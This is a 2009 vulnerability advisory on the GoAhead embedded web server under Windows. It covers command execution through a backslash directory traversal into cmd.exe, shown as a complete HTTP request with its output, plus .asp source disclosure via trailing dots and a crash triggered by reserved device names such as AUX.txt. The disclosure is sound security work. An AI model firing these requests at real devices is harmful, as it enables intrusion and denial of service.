Sekcje

Przejdź na skróty do treści. | Przejdź do nawigacji


Devices hacking research GoAhead embedded http server - multiple vulnerabilities (windows)

GoAhead embedded http server - multiple vulnerabilities (windows)

About GoAhead http server

The server is OpenSource "embedded web server" solution as mentioned here.

It is commonly used in soho class routers (we saw it on Linux-based routers).

But, the server can be used on variety of platforms including Linux and Windows (more info here).

The following flaws are presented to show, that popular embedded http servers are not necessarily heavily secured...

Flaws

We found multiple vulnerabilities in the newest version of http server (2.1.8) compiled to Windows platform.

Shell execution

UPDATE [01.06.2009]: As we noticed, the bug was reported (by Sergey Nenashev <alf@ntvi.ru>) LONG time ago. See:

http://www.securityfocus.com/bid/2334

But it seems, that the vendor did not care about it.

We provide the info here to stress that the bug can be found in "live" boxes using the web server.

---

 

Once the server had dir traversal issue on Windows, which seems to be fixed.

But there is even more serious vulnerability: OS command execution.

When you combine dir traversal with cgi module you have:

HTTP REQUEST: GET /cgi-bin/..\..\..\..\..\..\..\..\..\windows\system32\cmd.exe?/k+c:\windows\system32\ping.exe+127.0.0.1  HTTP/1.0 HTTP RESPONSE: HTTP/1.0 200 OK [...] Odpowiedz z 127.0.0.1: bajt?w=32 czas<1 ms TTL=128 Statystyka badania ping dla     :     Pakiety: Wyslane = 4, Odebrane = 4, Utracone = 0 (0% straty), Szacunkowy czas bladzenia pakiet?w w millisekundach:     Minimum = 0 ms, Maksimum = 0 ms, Czas sredni = 0 ms C:\webs1\WIN>

Comment:

In Windows systems the '\' character can be used as a directory separator.
In the cgi module (cgi.c), anti directory traversal is only implemented for the '/' character (see below).

cgi.c 65:    if ((cgiName = gstrchr(&cgiBuf[1], '/')) == NULL) {         websError(wp, 200, T("Missing CGI name"));         return 1;     }     cgiName++; 70:    if ((cp = gstrchr(cgiName, '/')) != NULL) {         *cp = '\0';     }

 

Script source disclosure

Windows systems can be a bit tricky when it comes to naming files: trailing dots or spaces are truncated when accessing/creating a file.

More specifically, see: http://msdn.microsoft.com/en-us/library/aa365247.aspx 

"Do not end a file or directory name with a trailing space or a period. Although the underlying file system may support such names, the operating system does not. However, it is acceptable to start a name with a period."

For example:

D:\tmp>mkdir "test.. ."

D:\tmp>dir

Wolumin w stacji D to Nowy

 Numer seryjny woluminu: 5C0B-7FC0

Katalog: D:\tmp 2009-01-24  11:59    <DIR>          . 2009-01-24  11:59    <DIR>          .. 2009-01-24  11:59    <DIR>         test 0 plik(ów)               0

3 katalog(ów)  53 613 948 928 bajtów wolnych

So, when requesting an .asp file, with dot(s) and/or space(s) appended, you get the source of the file.

For example, you make a request to "home.asp.. .":

  • the webserver detects, that the request is not performed to a .asp file (it does not end with ".asp").
  •  "open file" request is passed to the OS, and the OS is strips it to: "home.asp".
  • home.asp is served as plain text.

 

Affected file: web.c:

792:    if (gstrcmp(ext, T(".asp")) == 0) {

            wp->flags |= WEBS_ASP; }

http server DoS

Again we can check: http://msdn.microsoft.com/en-us/library/aa365247.aspx is a handy resource.

We read there: "Do not use the following reserved device names for the name of a file:
CON, PRN, AUX, NUL, COM1, COM2, COM3, COM4, COM5, COM6, COM7, COM8, COM9, LPT1, LPT2, LPT3, LPT4, LPT5, LPT6, LPT7, LPT8, and LPT9"
Also avoid these names followed immediately by an extension; for example, NUL.txt is not recommended."

Well, the problem was once addresed in the webserver. There is a protective function called "isBadWindowsPath", which blacklists the following words: 

default.c

 316:         if (              (badPath(parts[i], T("con"), 3)) ||              (badPath(parts[i], T("nul"), 3)) ||              (badPath(parts[i], T("aux"), 3)) ||              (badPath(parts[i], T("clock$"), 6)) ||              (badPath(parts[i], T("config$"), 7))

Unfortunatelly it does not protect against request in a specific context (accessing a blacklisted *file* - not blacklisted directory):

PoC:

Accessing AUX.txt crashes the webserver (http://host/AUX.txt)

Accessing COM1.txt (and maybe other COM-s... And LPT-s...). (http://host/COM1.txt).

Note that COM is not even blacklisted in the isBadWindowsPath function.

Vendor's reaction / issue history

  • The research was performed in late 2008.
  • The vendor was notified on 01.2009.
  • No reasonable response or fix till now
  • 15.05.2009 - public disclosure

Research / contact

  • We are performing research on web management interfaces on network appliances. If you want to help, feel free to contact as @ devices_hacking@securitum.pl

Disclaimer

  • All the information is provided for educational use only.
  • We strongly discourage to use the information for cracking purposes.
  • We are not responsible for damages made to your router - play with your router carefully.

 

Michal Sajdak
michal.sajdak@securitum.pl

Przydatne informacje? Polub nas na facebooku.

Darmowy magazyn o ITsec

zine
Subskrybuj RSS:
RSS